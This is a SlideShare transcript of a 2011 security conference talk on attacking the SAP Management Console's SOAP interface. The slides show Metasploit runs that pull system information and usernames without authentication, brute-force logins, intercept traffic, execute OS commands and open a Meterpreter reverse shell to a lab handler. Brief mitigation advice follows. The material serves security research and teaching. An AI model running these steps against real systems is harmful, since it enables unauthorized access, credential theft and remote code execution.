SlideShare a Scribd company logo

SecZone 2011: Scrubbing SAP clean with SOAP

Chris John Riley
Chris John Riley

SecZone 2011 - Cali, Colombia (29th Nov. 2011) SAP (in)security: Scrubbing SAP clean with SOAP ------ Note ------ This is a slightly updated version of my Hashdays 2011 talk. ---------- Abstract: ---------- At the heart of any large enterprise, lies a platform misunderstood and feared by all but the bravest systems administrators. Home to a wealth of information, and key to infinite wisdom. This platform is SAP. For years this system has been amongst the many "red pen" items on penetration tests and audits alike... but no more! We will no longer accept the cries of "Business critical, out-of-scope". The time for SAP has come, the cross-hairs of attackers are firmly focused on the soft underbelly that is ERM, and it's our duty to follow suit. Join me as we take the first steps into exploring SAP, extracting information and popping shells. Leave your Nessus license at the door! It's time to scrub this SAP system clean with SOAP! ----------

1 of 129
SAP (in)security Scrubbing SAP clean with SOAP Chris John Riley
“THE WISEST MAN, IS HE WHO KNOWS, THAT HE KNOWS NOTHING” SOCRATES: APOLOGY, 21D
NOT AN EXPERT!
SPANISH IS NOT MY STRONGPOINT
NO ME TOQUES AHÍ!
1) What's what 2) Information is king 3) Getting in the middle 4) Putting it all together 5) Stopping Bob!
WHAT’S WHAT
“…the world's leading provider of business software, SAP (which stands for "Systems, Applications, and Products in Data Processing") delivers products and services that help accelerate business innovation for our customers.”
Other people describe them as… “…the world's leading repository of business critical information, SAP (which stands for ”Security Ain't [our] Problem") delivers products and services that help attackers gain access to critical enterprise data.”
Some rights reserved by TrevinC
IS IT REALLY THAT BAD?
Some rights reserved by Telstar Logistics
Some rights reserved by Telstar Logistics
So Many Reasons  Vulnerabilties are a part of it!  Every system has it‘s vulnerabilities  SAP installations often fall to business  Not an operations problem  Financial data should be handled by the business  Security team never gets close to it!
“YOU CAN'T TEST THAT, IT'S BUSINESS CRITICAL!” UNKNOWN PROJECT MANAGER
You’re getting SOAP all over my SAP! THIS TALK SAP Security Netweaver . SOAP
Some rights reserved by Telstar Logistics
SIMPLE OBJECT ACCESS PROTOCOL
WRONG KIND OF SOAP!
SOAP Request Example (1) POST /InStock HTTP/1.1 .... <?xml version="1.0"?> <soap:Envelope xmlns:soap="http://www.w3.org/2001/12/soap- envelope" soap:encodingStyle="http://www.w3.org/2001/12/so ap-encoding"> <soap:Body>....</soap:Body> </soap:Envelope>
SOAP Request Example (1) POST /InStock HTTP/1.1 .... <?xml version="1.0"?> <soap:Envelope xmlns:soap="http://www.w3.org/2001/12/soap- envelope" soap:encodingStyle="http://www.w3.org/2001/12/so ap-encoding"> <soap:Body>....</soap:Body> </soap:Envelope>
SOAP Request Example (2) ... <soap:Body xmlns:m="http://test.org/stock"> <m:GetStockPrice> <m:StockName>SAP</m:StockName> </m:GetStockPrice> </soap:Body> ...
SOAP Request Example (2) ... <soap:Body xmlns:m="http://test.org/stock"> <m:GetStockPrice> <m:StockName>SAP</m:StockName> </m:GetStockPrice> </soap:Body> ...
SOAP Response Example ... <m:GetStockPriceResponse> <m:Price>34.5</m:Price> </m:GetStockPriceResponse> </soap:Body> ...
SOAP Response Example ... <m:GetStockPriceResponse> <m:Price>34.5</m:Price> </m:GetStockPriceResponse> </soap:Body> ...
A LITTLE BIT ABOUT SAP MANAGEMENT CONSOLE
SAP MC Communications  Default port 5<instance>13/14  50013 HTTP  50014 HTTPS  Can use SSL  If it‘s configured  More on this later!
SAP MC Communications  Uses Basic auth for some functions  Yes... It‘s 2011  Yes... Companies still use Basic Auth  Most functions don‘t even use that!  Yes... Unauthenticated!
ENABLED BY DEFAULT…
ON ALL SAP SYSTEMS!
SAP MC MMC Snap-in
SAP MC JAVA Applet
INFORMATION IS KING
“If there's one thing SAP MC loves, it's giving away information“ Quote by: Me, just now!
Nessus will save us!
Show me the money!
Information is king  Version information  Sure, HTTP headers give that!  Nothing new here... mostly  Down to the patch-level  Can you say “targeted attack“
Version Information msf auxiliary(sap_mgmt_con_version) > show options Module options (auxiliary/scanner/sap/sap_mgmt_con_version): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no Use a proxy chain RHOSTS 172.16.15.128 yes The target address range RPORT 50013 yes The target port THREADS 1 yes The number of threads URI / no Path to the SAP MC VHOST no HTTP server virtual host
Version Information msf auxiliary(sap_mgmt_con_version) > show options Module options (auxiliary/scanner/sap/sap_mgmt_con_version): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no Use a proxy chain RHOSTS 172.16.15.128 yes The target address range RPORT 50013 yes The target port THREADS 1 yes The number of threads URI / no Path to the SAP MC VHOST no HTTP server virtual host
Version Information msf auxiliary(sap_mgmt_con_version) > run [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface [+] [SAP] Version Number Extracted - 172.16.15.128:50013 [+] [SAP] Version: 720, patch 70, changelist 1203517, optU, NTintel [+] [SAP] SID: NSP [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
Version Information msf auxiliary(sap_mgmt_con_version) > run [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface [+] [SAP] Version Number Extracted - 172.16.15.128:50013 [+] [SAP] Version: 720, patch 70, changelist 1203517, optU, NTintel [+] [SAP] SID: NSP [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
Information is king  Startup profile  Instance name  SAP System Name  SAP SID  SAP DB Schema  Paths  ....
Startup Profile msf auxiliary(sap_mgmt_con_startprofile) > run [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface [+] [SAP] Startup Profile Extracted: WINXPSAP- TSTsapmntNSPSYSprofileSTART_DVEBMGS00_WINXPSAP -TST [*] SAPSYSTEMNAME = NSP [*] SAPGLOBALHOST = WINXPSAP-TST [*] SAPSYSTEM = 00 [*] INSTANCE_NAME = DVEBMGS00 [*] DIR_PROFILE = WINXPSAP-TSTsapmntNSPSYSprofile [*] _PF = $(DIR_PROFILE)NSP_DVEBMGS00_WINXPSAP-TST [*] dbs/ada/schema = SAPNSP
Startup Profile msf auxiliary(sap_mgmt_con_startprofile) > run [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface [+] [SAP] Startup Profile Extracted: WINXPSAP- TSTsapmntNSPSYSprofileSTART_DVEBMGS00_WINXPSAP -TST [*] SAPSYSTEMNAME = NSP [*] SAPGLOBALHOST = WINXPSAP-TST [*] SAPSYSTEM = 00 [*] INSTANCE_NAME = DVEBMGS00 [*] DIR_PROFILE = WINXPSAP-TSTsapmntNSPSYSprofile [*] _PF = $(DIR_PROFILE)NSP_DVEBMGS00_WINXPSAP-TST [*] dbs/ada/schema = SAPNSP
Information is king  Server / Instance Environment  Computername  OS Service userame  Database Names  Database Type (Oracle, MaxDB, ...)  Full Server Environment Variable list!  Information overload  OMG why!
Environment msf auxiliary(sap_mgmt_con_getenv) > run [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface [*] COMPUTERNAME=WINXPSAP-TST [*] ComSpec=C:WINDOWSsystem32cmd.exe [*] DBMS_TYPE=ada [*] FP_NO_HOST_CHECK=NO [*] OS=Windows_NT [*] USERNAME=SAPServiceNSP [*] PSModulePath=C:windowssystem32PowerShell... [*] SAPEXE=E:usrsapNSPSYSexeucNTI386 [*] TMP=E:usrsapNSPtmp
Environment msf auxiliary(sap_mgmt_con_getenv) > run [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface [*] COMPUTERNAME=WINXPSAP-TST [*] ComSpec=C:WINDOWSsystem32cmd.exe [*] DBMS_TYPE=ada [*] FP_NO_HOST_CHECK=NO [*] OS=Windows_NT Operating System User [*] USERNAME=SAPServiceNSP [*] PSModulePath=C:windowssystem32PowerShell... [*] SAPEXE=E:usrsapNSPSYSexeucNTI386 [*] TMP=E:usrsapNSPtmp
Information is king  SAP Log/Tracefiles  SAP Startup Logs  Error / Debug Logs  Developer Traces  Security Logs  SAP ABAPSysLog  SAP Startup Times  PIDs  Services + Status Info
Log/Trace Files msf auxiliary(sap_mgmt_con_listlogfiles) > run [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface Filename Size Timestamp -------- ---- --------- available.log 2268 2011 10 16 12:52:33 dev_cp 4397 2011 04 19 10:30:48 dev_disp 4612 2011 10 14 15:06:14 dev_icm 6594 2011 10 14 15:07:38 sapstart.log 629 2011 10 14 15:06:04 sapstartsrv.log 754 2011 10 16 10:04:36 stderr1 903 2011 10 14 15:06:04
Log/Trace Files <SAPControl:ReadDeveloperTraceResponse> <name>E:usrsapNSPDVEBMGS00workdev_w0<name> <item>trc file: "dev_w0", trc level: 1, release: "720"</item> <item>---------------------------------------------------</item> <item>* ACTIVE TRACE LEVEL 1</item> <item>M pid 3564</item> <item>M DpSysAdmExtCreate: ABAP is active</item> <item>M DpShMCreate: allocated sys_adm at 09A40048</item> <item>M DpShMCreate: allocated wp_adm at 09A43020</item> <item>M DpShMCreate: allocated tm_adm at 09A47E48</item> …
ABAP Log File <SAPControl:ABAPReadSyslogResponse><log> <item><Time>2011 10 14 15:06:18</Time> <Text>SAP: ICM started on host WINXPSAP-TST (PID: 3536) </Text><Severity>SAPControl-GREEN</Severity> <item><Time>2011 10 14 15:06:12</Time> <Text>SAP Basis: Active ICU Version 3.4; Compiled With ICU 3.4; Unicode Version 4.1 </Text><Severity>SAPControl-GREEN</Severity></item> …
Information is king  Extracting data from logfiles  Logfiles include usernames  Scrape for SAP usernames  Instant brute-force user list!  Just an example of the data availble
Extract SAP Users [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface [+] [SAP] Users Extracted: 10 entries extracted [+] [SAP] Extracted User: SAPSYS [+] [SAP] Extracted User: TEST1 [+] [SAP] Extracted User: TESTDEV [+] [SAP] Extracted User: ADMIN1 [+] [SAP] Extracted User: SADM [+] [SAP] Extracted User: TEST2 …
Extract SAP Users [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface [+] [SAP] Users Extracted: 10 entries extracted [+] [SAP] Extracted User: SAPSYS SAP USERS [+] [SAP] Extracted User: TEST1 [+] [SAP] Extracted User: TESTDEV [+] [SAP] Extracted User: ADMIN1 [+] [SAP] Extracted User: SADM [+] [SAP] Extracted User: TEST2 …
Information is king  Process Parameters  Output of the entire SAP configuration  Password Policies  Setup your Brute-force just right ;)  Hash Types  Still supporting those old 8 char hashes?  Security Audit Log Enabled ?  rsau/enabled (default: 0)  Is anybody watching?
Process Parameters msf auxiliary(sap_mgmt_con_getprocessparameter) > run [*] [SAP] Connecting to SAP MC on 172.16.15.128:50013 [*] [SAP] Attempting to matche (?i-mx:^login/password) [SAP] Process Parameters Name Value ------ ---------- login/password_charset 1 login/password_downwards_compatibility 1 login/password_hash_algorithm encoding=RFC2307, algorithm=iSSHA-1, saltsize=96 login/password_max_idle_productive 0
Process Parameters msf auxiliary(sap_mgmt_con_getprocessparameter) > run [*] [SAP] Connecting to SAP MC on 172.16.15.128:50013 [*] [SAP] Attempting to matche (?i-mx:^login/password) [SAP] Process Parameters Name Value ------ ---------- login/password_charset 1 login/password_downwards_compatibility 1 login/password_hash_algorithm encoding=RFC2307, algorithm=iSSHA-1, saltsize=96 login/password_max_idle_productive 0
Process Parameters <SAPControl:GetProcessParameterResponse><parameter> <item><name>DIR_AUDIT</name> <group>System</group> <description>Directory for security audit files</description> <unit/><value>E:usrsapNSPDVEBMGS00log</value></item> <item><name>login/fails_to_user_lock</name> <group>Login</group> <description>Number of invalid login attempts until user lock</description> <unit/><value> 5 </value></item> …
Process Parameters <SAPControl:GetProcessParameterResponse><parameter> <item><name>DIR_AUDIT</name> <group>System</group> <description>Directory for security audit files</description> <unit/><value>E:usrsapNSPDVEBMGS00log</value></item> <item><name>login/fails_to_user_lock</name> <group>Login</group> <description>Number of invalid login attempts until user lock</description> <unit/><value> 5 </value></item> …
Information is king  Useful Process Parameters  rsau/enabled  login/password_downward_compatibility  login/failed_user_auto_unlock  login/fails_to_user_lock  login/min_password_lng  login/password_charset  .... *Checkout consolut.com for a great list
“I put a whitebox configuration audit in your blackbox penetration test, so you can whitebox SAP while you blackbox it!“ Quote by: Me, just now!
INCASE YOU FORGOT…
ALL THE FUNCTIONS SO FAR ARE UNAUTHENTICATED
BUT IT'S OK!
YOU HAVE TO BE
INSIDE
THE NETWORK…
Right?
Right?
Right?
2,700 Number of SAP servers 2,675 listening on public addresses 2,650 2,625 2,600 2,575 2,550 2,525 2,500 Router Gateway SAP MC SAP MC (SSL)
Some rights reserved by Crystl
GETTING IN THE MIDDLE
Basic auth is your friend!
SAP MC authentication
MAN IN THE MIDDLE…
LET ME COUNT THE WAYS…
Getting in the middle  Force Authentication  Basic Auth == Clear Text  Credentials FTW!  Alter Requests  Do what YOU want  Alter Responses
SAP MC authentication
SAP MC authentication
SSL PROTECTION 4 MAJOR OPTIONS
Getting in the middle Self Signed
Getting in the middle Device Default  Often the same on EVERY device  Not an option for SAP
Getting in the middle Enterprise CA  You sign your own certs centrally  PKI Infrastructure
Getting in the middle Externally signed  Diginotar to the rescue!  SAP also offer signing services
Getting in the middle  Impersonate SSL  There‘s a module for that!  Metasploit (ssl_impersonate.rb)  Creates a fake cert  As close to the original as possible  Useful SE options  Expired yesterday  Add CN names for ease of use
Getting in the middle As near as darn a clone of the original Fingerprints + Serial Number differ
Getting in the middle All CN data is 100% cloned… Average users don’t care!
PUTTING IT ALL TOGETHER
OSExecute  SAP MC generously offers OSExecute function  Valid username/password req.  That‘s handy!
USERNAME / PASSWORD?
MITM  Using the force-auth method  Check under the keyboard  Post-it notes!  Rubber hose method
Brute-Force  Metasploit module  Set SAP SID for SAP specific checks  Watchout for lockouts!  Denial of Service?
Brute Force msf auxiliary(sap_mgmt_con_brute_login) > set SAP_SID NSP msf auxiliary(sap_mgmt_con_brute_login) > run [*] SAPSID set to 'NSP' - Setting default SAP wordlist [*] Trying username:'sapservicensp' password:'' [-] [01/18] - failed to login as 'sapservicensp' password: '' [*] Trying username:'sapservicensp' password:'sapserviceNSP’ [-] [02/18] - failed to login as 'sapadm' password: '' [*] Trying username:'nspadm' password:'' …
OSExecute auxiliary(sap_..._osexec) > set RHOSTS 172.16.15.128 auxiliary(sap_..._osexec) > set USERNAME sapservicensp auxiliary(sap_..._osexec) > set PASSWORD Pr0d@dm1n auxiliary(sap_..._osexec) > set CMD hostname auxiliary(sap_..._osexec) > run [*] [SAP] Connecting to SAP Mgmt Console SOAP Interface [+] [SAP] Command run as PID: 1240 Command output -------------- WINXPSAP-TST
THANKS, BUT WE WANT FULL ACCESS!
Getting Meterpreter  Using tricks built into Metasploit  Encode Payload  Split it up into chucks  Shove it in  Start it up!  Profit
OSExecute Meterpreter msf exploit(sap_mgmt_con_osexec_exploit) > exploit [*] Started reverse handler on 172.16.15.134:4444 [*] Command Stager - 7.42% done (7499/101079 bytes) ... [*] Command Stager - 100.00% done (101079/101079 bytes) [*] Meterpreter session 1 opened (172.16.15.134:4444 -> 172.16.15.128:1144) at 2011-10-16 14:41:59 +0200 meterpreter > getuid Server username: WINXPSAP-TSTSAPServiceNSP
STOPPING BOB!
WHY IS YOUR SAP MC ACCESSIBLE TO THE WORLD!
SLIGHTLY LESS HTTPS== BAD
Fixing the issues  SAP Fix  Note 1439348  Issue also discovered by Onapsis  No idea what it says!  SAP restrict ALL fix info to customers only
SAP SECURITY ISN’T ALL ABOUT ROLED
INFRASTRUCTURE
DATABASE
WEB APPLICATIONS
CLIENT-SIDE APPS
SAP IS COMPLEX TEST IT!
Questions ? http://c22.cc contact@c22.cc
Big Thanks  The REAL SAP Security Researchers  Onapsis, DSecRG, Raul Siles, CYBSEC  SAP PSRT (for emailing me a lot)  DirtySec (You know who you are!)  MacLemon (for the PPT-fu)  ED  For inviting us, even though we cause problems!  All the people who helped make this happen
Thanks for coming http://c22.cc contact@c22.cc
Sorry for sucking so bad! http://c22.cc contact@c22.cc

Recommended

SAP (in)security: Scrubbing SAP clean with SOAP
SAP (in)security: Scrubbing SAP clean with SOAPSAP (in)security: Scrubbing SAP clean with SOAP
SAP (in)security: Scrubbing SAP clean with SOAP
Chris John Riley
 
NetApp ontap simulator
NetApp ontap simulatorNetApp ontap simulator
NetApp ontap simulator
Ashwin Pawar
 
How to add non root user account to netapp for commvault
How to add non root user account to netapp for commvaultHow to add non root user account to netapp for commvault
How to add non root user account to netapp for commvault
Ashwin Pawar
 
Backup workflow for SMHV on windows 2008R2 HYPER-V
Backup workflow for SMHV on windows 2008R2 HYPER-VBackup workflow for SMHV on windows 2008R2 HYPER-V
Backup workflow for SMHV on windows 2008R2 HYPER-V
Ashwin Pawar
 
Tested install-isp config3-ubuntu-16-04
Tested install-isp config3-ubuntu-16-04Tested install-isp config3-ubuntu-16-04
Tested install-isp config3-ubuntu-16-04
SANTIAGO HERNÁNDEZ
 
Your Inner Sysadmin - LonestarPHP 2015
Your Inner Sysadmin - LonestarPHP 2015Your Inner Sysadmin - LonestarPHP 2015
Your Inner Sysadmin - LonestarPHP 2015
Chris Tankersley
 
PHP & Performance
PHP & PerformancePHP & Performance
PHP & Performance
毅 吕
 
Linux Desktop Automation
Linux Desktop AutomationLinux Desktop Automation
Linux Desktop Automation
Rui Lapa
 

Recommended

SAP (in)security: Scrubbing SAP clean with SOAP
SAP (in)security: Scrubbing SAP clean with SOAPSAP (in)security: Scrubbing SAP clean with SOAP
SAP (in)security: Scrubbing SAP clean with SOAP
Chris John Riley
 
NetApp ontap simulator
NetApp ontap simulatorNetApp ontap simulator
NetApp ontap simulator
Ashwin Pawar
 
How to add non root user account to netapp for commvault
How to add non root user account to netapp for commvaultHow to add non root user account to netapp for commvault
How to add non root user account to netapp for commvault
Ashwin Pawar
 
Backup workflow for SMHV on windows 2008R2 HYPER-V
Backup workflow for SMHV on windows 2008R2 HYPER-VBackup workflow for SMHV on windows 2008R2 HYPER-V
Backup workflow for SMHV on windows 2008R2 HYPER-V
Ashwin Pawar
 
Tested install-isp config3-ubuntu-16-04
Tested install-isp config3-ubuntu-16-04Tested install-isp config3-ubuntu-16-04
Tested install-isp config3-ubuntu-16-04
SANTIAGO HERNÁNDEZ
 
Your Inner Sysadmin - LonestarPHP 2015
Your Inner Sysadmin - LonestarPHP 2015Your Inner Sysadmin - LonestarPHP 2015
Your Inner Sysadmin - LonestarPHP 2015
Chris Tankersley
 
PHP & Performance
PHP & PerformancePHP & Performance
PHP & Performance
毅 吕
 
Linux Desktop Automation
Linux Desktop AutomationLinux Desktop Automation
Linux Desktop Automation
Rui Lapa
 
在Oel5上安装配置oracle gird control 10.2.0.5
在Oel5上安装配置oracle gird control 10.2.0.5在Oel5上安装配置oracle gird control 10.2.0.5
在Oel5上安装配置oracle gird control 10.2.0.5maclean liu
 
Free radius billing server with practical vpn exmaple
Free radius billing server with practical vpn exmapleFree radius billing server with practical vpn exmaple
Free radius billing server with practical vpn exmaple
Chanaka Lasantha
 
What you need to remember when you upload to CPAN
What you need to remember when you upload to CPANWhat you need to remember when you upload to CPAN
What you need to remember when you upload to CPAN
charsbar
 
Fail2ban
Fail2banFail2ban
Fail2banRuslan Conk
 
Setting up a HADOOP 2.2 cluster on CentOS 6
Setting up a HADOOP 2.2 cluster on CentOS 6Setting up a HADOOP 2.2 cluster on CentOS 6
Setting up a HADOOP 2.2 cluster on CentOS 6
Manish Chopra
 
L.A.M.P Installation Note --- CentOS 6.5
L.A.M.P Installation Note --- CentOS 6.5L.A.M.P Installation Note --- CentOS 6.5
L.A.M.P Installation Note --- CentOS 6.5
William Lee
 
MySQL InnoDB Cluster 미리보기 (remote cluster test)
MySQL InnoDB Cluster 미리보기 (remote cluster test)MySQL InnoDB Cluster 미리보기 (remote cluster test)
MySQL InnoDB Cluster 미리보기 (remote cluster test)
Seungmin Yu
 
J Ruby On Rails Presentation
J Ruby On Rails PresentationJ Ruby On Rails Presentation
J Ruby On Rails Presentationrailsconf
 
Watch Me Install Alfresco
Watch Me Install AlfrescoWatch Me Install Alfresco
Watch Me Install Alfresco
Alfresco Software
 
Ex200
Ex200Ex200
Ex200
teguh imanto
 
How to shutdown and power up of the netapp cluster mode storage system
How to shutdown and power up of the netapp cluster mode storage systemHow to shutdown and power up of the netapp cluster mode storage system
How to shutdown and power up of the netapp cluster mode storage system
Saroj Sahu
 
RPM: Speed up your deploy
RPM: Speed up your deployRPM: Speed up your deploy
RPM: Speed up your deploy
fcrippa
 
Instalar PENTAHO 5 en CentOS 6
Instalar PENTAHO 5 en CentOS 6Instalar PENTAHO 5 en CentOS 6
Instalar PENTAHO 5 en CentOS 6
Moisés Elías Araya
 
How to enable efficiency (deduplication and compression in netapp cluster mod...
How to enable efficiency (deduplication and compression in netapp cluster mod...How to enable efficiency (deduplication and compression in netapp cluster mod...
How to enable efficiency (deduplication and compression in netapp cluster mod...
Saroj Sahu
 
Athenticated smaba server config with open vpn
Athenticated smaba server config with open vpnAthenticated smaba server config with open vpn
Athenticated smaba server config with open vpn
Chanaka Lasantha
 
linux_Commads
linux_Commadslinux_Commads
linux_Commads
tastedone
 
Lamp configuration u buntu 10.04
Lamp configuration u buntu 10.04Lamp configuration u buntu 10.04
Lamp configuration u buntu 10.04mikehie
 
MySQL Multi-Source Replication for PL2016
MySQL Multi-Source Replication for PL2016MySQL Multi-Source Replication for PL2016
MySQL Multi-Source Replication for PL2016Wagner Bianchi
 
Drupal 7,8 Coder and PHPcodesniffer installation guide
Drupal 7,8 Coder and PHPcodesniffer installation guideDrupal 7,8 Coder and PHPcodesniffer installation guide
Drupal 7,8 Coder and PHPcodesniffer installation guide
Gaurav Agrawal
 
Samba Optimization and Speed Tuning f...
Samba Optimization and Speed Tuning f...Samba Optimization and Speed Tuning f...
Samba Optimization and Speed Tuning f...wensheng wei
 
The Art of Grey-Box Attack
The Art of Grey-Box AttackThe Art of Grey-Box Attack
The Art of Grey-Box AttackPrathan Phongthiproek
 
Atmosphere Conference 2015: Taming the Modern Datacenter
Atmosphere Conference 2015: Taming the Modern DatacenterAtmosphere Conference 2015: Taming the Modern Datacenter
Atmosphere Conference 2015: Taming the Modern Datacenter
PROIDEA
 

More Related Content

What's hot

在Oel5上安装配置oracle gird control 10.2.0.5
在Oel5上安装配置oracle gird control 10.2.0.5在Oel5上安装配置oracle gird control 10.2.0.5
在Oel5上安装配置oracle gird control 10.2.0.5maclean liu
 
Free radius billing server with practical vpn exmaple
Free radius billing server with practical vpn exmapleFree radius billing server with practical vpn exmaple
Free radius billing server with practical vpn exmaple
Chanaka Lasantha
 
What you need to remember when you upload to CPAN
What you need to remember when you upload to CPANWhat you need to remember when you upload to CPAN
What you need to remember when you upload to CPAN
charsbar
 
Setting up a HADOOP 2.2 cluster on CentOS 6
Setting up a HADOOP 2.2 cluster on CentOS 6Setting up a HADOOP 2.2 cluster on CentOS 6
Setting up a HADOOP 2.2 cluster on CentOS 6
Manish Chopra
 
L.A.M.P Installation Note --- CentOS 6.5
L.A.M.P Installation Note --- CentOS 6.5L.A.M.P Installation Note --- CentOS 6.5
L.A.M.P Installation Note --- CentOS 6.5
William Lee
 
MySQL InnoDB Cluster 미리보기 (remote cluster test)
MySQL InnoDB Cluster 미리보기 (remote cluster test)MySQL InnoDB Cluster 미리보기 (remote cluster test)
MySQL InnoDB Cluster 미리보기 (remote cluster test)
Seungmin Yu
 
J Ruby On Rails Presentation
J Ruby On Rails PresentationJ Ruby On Rails Presentation
J Ruby On Rails Presentationrailsconf
 
Watch Me Install Alfresco
Watch Me Install AlfrescoWatch Me Install Alfresco
Watch Me Install Alfresco
Alfresco Software
 
Ex200
Ex200Ex200
Ex200
teguh imanto
 
How to shutdown and power up of the netapp cluster mode storage system
How to shutdown and power up of the netapp cluster mode storage systemHow to shutdown and power up of the netapp cluster mode storage system
How to shutdown and power up of the netapp cluster mode storage system
Saroj Sahu
 
RPM: Speed up your deploy
RPM: Speed up your deployRPM: Speed up your deploy
RPM: Speed up your deploy
fcrippa
 
Instalar PENTAHO 5 en CentOS 6
Instalar PENTAHO 5 en CentOS 6Instalar PENTAHO 5 en CentOS 6
Instalar PENTAHO 5 en CentOS 6
Moisés Elías Araya
 
How to enable efficiency (deduplication and compression in netapp cluster mod...
How to enable efficiency (deduplication and compression in netapp cluster mod...How to enable efficiency (deduplication and compression in netapp cluster mod...
How to enable efficiency (deduplication and compression in netapp cluster mod...
Saroj Sahu
 
Athenticated smaba server config with open vpn
Athenticated smaba server config with open vpnAthenticated smaba server config with open vpn
Athenticated smaba server config with open vpn
Chanaka Lasantha
 
linux_Commads
linux_Commadslinux_Commads
linux_Commads
tastedone
 
Lamp configuration u buntu 10.04
Lamp configuration u buntu 10.04Lamp configuration u buntu 10.04
Lamp configuration u buntu 10.04mikehie
 
MySQL Multi-Source Replication for PL2016
MySQL Multi-Source Replication for PL2016MySQL Multi-Source Replication for PL2016
MySQL Multi-Source Replication for PL2016Wagner Bianchi
 
Drupal 7,8 Coder and PHPcodesniffer installation guide
Drupal 7,8 Coder and PHPcodesniffer installation guideDrupal 7,8 Coder and PHPcodesniffer installation guide
Drupal 7,8 Coder and PHPcodesniffer installation guide
Gaurav Agrawal
 
Samba Optimization and Speed Tuning f...
Samba Optimization and Speed Tuning f...Samba Optimization and Speed Tuning f...
Samba Optimization and Speed Tuning f...wensheng wei
 

What's hot (20)

在Oel5上安装配置oracle gird control 10.2.0.5
在Oel5上安装配置oracle gird control 10.2.0.5在Oel5上安装配置oracle gird control 10.2.0.5
在Oel5上安装配置oracle gird control 10.2.0.5
 
Free radius billing server with practical vpn exmaple
Free radius billing server with practical vpn exmapleFree radius billing server with practical vpn exmaple
Free radius billing server with practical vpn exmaple
 
What you need to remember when you upload to CPAN
What you need to remember when you upload to CPANWhat you need to remember when you upload to CPAN
What you need to remember when you upload to CPAN
 
Fail2ban
Fail2banFail2ban
Fail2ban
 
Setting up a HADOOP 2.2 cluster on CentOS 6
Setting up a HADOOP 2.2 cluster on CentOS 6Setting up a HADOOP 2.2 cluster on CentOS 6
Setting up a HADOOP 2.2 cluster on CentOS 6
 
L.A.M.P Installation Note --- CentOS 6.5
L.A.M.P Installation Note --- CentOS 6.5L.A.M.P Installation Note --- CentOS 6.5
L.A.M.P Installation Note --- CentOS 6.5
 
MySQL InnoDB Cluster 미리보기 (remote cluster test)
MySQL InnoDB Cluster 미리보기 (remote cluster test)MySQL InnoDB Cluster 미리보기 (remote cluster test)
MySQL InnoDB Cluster 미리보기 (remote cluster test)
 
J Ruby On Rails Presentation
J Ruby On Rails PresentationJ Ruby On Rails Presentation
J Ruby On Rails Presentation
 
Watch Me Install Alfresco
Watch Me Install AlfrescoWatch Me Install Alfresco
Watch Me Install Alfresco
 
Ex200
Ex200Ex200
Ex200
 
How to shutdown and power up of the netapp cluster mode storage system
How to shutdown and power up of the netapp cluster mode storage systemHow to shutdown and power up of the netapp cluster mode storage system
How to shutdown and power up of the netapp cluster mode storage system
 
RPM: Speed up your deploy
RPM: Speed up your deployRPM: Speed up your deploy
RPM: Speed up your deploy
 
Instalar PENTAHO 5 en CentOS 6
Instalar PENTAHO 5 en CentOS 6Instalar PENTAHO 5 en CentOS 6
Instalar PENTAHO 5 en CentOS 6
 
How to enable efficiency (deduplication and compression in netapp cluster mod...
How to enable efficiency (deduplication and compression in netapp cluster mod...How to enable efficiency (deduplication and compression in netapp cluster mod...
How to enable efficiency (deduplication and compression in netapp cluster mod...
 
Athenticated smaba server config with open vpn
Athenticated smaba server config with open vpnAthenticated smaba server config with open vpn
Athenticated smaba server config with open vpn
 
linux_Commads
linux_Commadslinux_Commads
linux_Commads
 
Lamp configuration u buntu 10.04
Lamp configuration u buntu 10.04Lamp configuration u buntu 10.04
Lamp configuration u buntu 10.04
 
MySQL Multi-Source Replication for PL2016
MySQL Multi-Source Replication for PL2016MySQL Multi-Source Replication for PL2016
MySQL Multi-Source Replication for PL2016
 
Drupal 7,8 Coder and PHPcodesniffer installation guide
Drupal 7,8 Coder and PHPcodesniffer installation guideDrupal 7,8 Coder and PHPcodesniffer installation guide
Drupal 7,8 Coder and PHPcodesniffer installation guide
 
Samba Optimization and Speed Tuning f...
Samba Optimization and Speed Tuning f...Samba Optimization and Speed Tuning f...
Samba Optimization and Speed Tuning f...
 

Similar to SecZone 2011: Scrubbing SAP clean with SOAP

Atmosphere Conference 2015: Taming the Modern Datacenter
Atmosphere Conference 2015: Taming the Modern DatacenterAtmosphere Conference 2015: Taming the Modern Datacenter
Atmosphere Conference 2015: Taming the Modern Datacenter
PROIDEA
 
sap basis transaction codes
sap basis transaction codessap basis transaction codes
sap basis transaction codes
EOH SAP Services
 
Sap basis administrator user guide
Sap basis administrator user guideSap basis administrator user guide
Sap basis administrator user guide
PoguttuezhiniVP
 
SharePoint 2010 Virtualization - SharePoint Saturday L.A.
SharePoint 2010 Virtualization - SharePoint Saturday L.A.SharePoint 2010 Virtualization - SharePoint Saturday L.A.
SharePoint 2010 Virtualization - SharePoint Saturday L.A.Michael Noel
 
SharePoint 2010 Virtualization - Norway SharePoint User Group
SharePoint 2010 Virtualization - Norway SharePoint User GroupSharePoint 2010 Virtualization - Norway SharePoint User Group
SharePoint 2010 Virtualization - Norway SharePoint User GroupMichael Noel
 
점진적인 레거시 웹 애플리케이션 개선 과정
점진적인 레거시 웹 애플리케이션 개선 과정점진적인 레거시 웹 애플리케이션 개선 과정
점진적인 레거시 웹 애플리케이션 개선 과정
Arawn Park
 
SaltConf14 - Ben Cane - Using SaltStack in High Availability Environments
SaltConf14 - Ben Cane - Using SaltStack in High Availability EnvironmentsSaltConf14 - Ben Cane - Using SaltStack in High Availability Environments
SaltConf14 - Ben Cane - Using SaltStack in High Availability Environments
SaltStack
 
Caching and tuning fun for high scalability
Caching and tuning fun for high scalabilityCaching and tuning fun for high scalability
Caching and tuning fun for high scalability
Wim Godden
 
Champion Fas Deduplication
Champion Fas DeduplicationChampion Fas Deduplication
Champion Fas Deduplication
Michael Hudak
 
Intrusion Detection System using Snort
